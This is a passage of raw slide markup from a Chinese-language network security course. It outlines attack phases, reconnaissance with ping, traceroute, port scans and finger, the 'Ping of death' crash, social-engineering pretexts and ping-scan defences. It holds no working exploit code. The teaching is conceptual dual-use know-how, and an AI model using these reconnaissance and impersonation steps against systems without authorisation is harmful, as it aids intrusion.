              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" b="1"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51236" name="AutoShape 36"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2758877" y="3212976"/>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666699"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="51246" name="Group 46"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6549829" y="1447800"/>
            <a:ext cx="2165350" cy="3373438"/>
            <a:chOff x="4391" y="912"/>
            <a:chExt cx="1364" cy="2125"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51238" name="Text Box 38"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4391" y="912"/>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anose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>后攻击</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51239" name="Rectangle 39"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4425" y="1298"/>
              <a:ext cx="1305" cy="1739"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent4">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后门木马</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" b="1"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="1"/>
                <a:t>痕迹</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="1" smtClean="0"/>
                <a:t>擦除</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" b="1"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51243" name="AutoShape 43"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5791002" y="3212976"/>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1763688" y="4581129"/>
            <a:ext cx="5544616" cy="22768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其它攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>种类</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>拒绝服务攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>嗅探攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>恶意网页攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>社会工程攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="C0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rmAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>信息（情报）收集</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址，主机是否存活</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>端口（服务）是否开放</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>到要入侵点的路由</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>主机操作系统（指纹）识别</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>资源和用户信息扫描：网络资源，共享资源，用户名和用户组等</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10242" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>预攻击概述</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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smtClean="0"/>
              <a:t>信息收集</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54275" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>技术手段</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>非技术手段</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="内容占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Ping</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>判断目标主机是否开启，或数据包往返时间</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Tracert / Traceroute</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>跟踪从一台计算机到另外一台计算机所走的路径</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>port scan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Rusers / Finger</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>收集用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>信息 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Host / nslookup</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>主机名解析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>到网络</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>或网络</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>地址解析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>到主机名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="内容占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>合法途径</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>从目标机构的网站获取</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>新闻报道，出版物</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>新闻组或论坛</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>搜索引擎</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>社会工程手段</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>假冒他人，获取第三方的信任</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>发</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ICMP Echo request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>消息，等待</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ICMP Echo Reply</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>消息</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>每秒发一个包，显示响应输出，计算网络来回的时间</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>最后显示统计结果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>丢包率</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12290" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>原理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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456892"/>
            <a:ext cx="5868144" cy="440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rmAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>有许多命令行参数，可以改变缺省的行为</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>不成功：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>主机未开启</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>路由、网关设置不正确</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>网卡配置不正确</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>timeout</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>被防火墙阻止</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>……</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>“Ping of death”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>发送特大</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>数据包</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>(&gt;65535</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>字节</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>导致机器崩溃</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>协议头部字段：总长</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>位</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>许多老的操作系统都受影响</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14338" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>命令行参数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Pinger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Ping Sweep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>WS_Ping ProPack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15362" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>平台</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>工具</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1536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3032720"/>
            <a:ext cx="581501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889720"/>
            <a:ext cx="6053138"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smtClean="0"/>
              <a:t>Ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>协议来发送数据包：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>使用检测并记录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>扫描的工具</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>入侵检测系统</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>在防火墙或路由器中设置允许进出自己网络的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>分组类型</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47106" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>扫描预防</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>措施</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>使用应用程序测试：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>：使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Telnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>等用户软件向目标主机申请</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
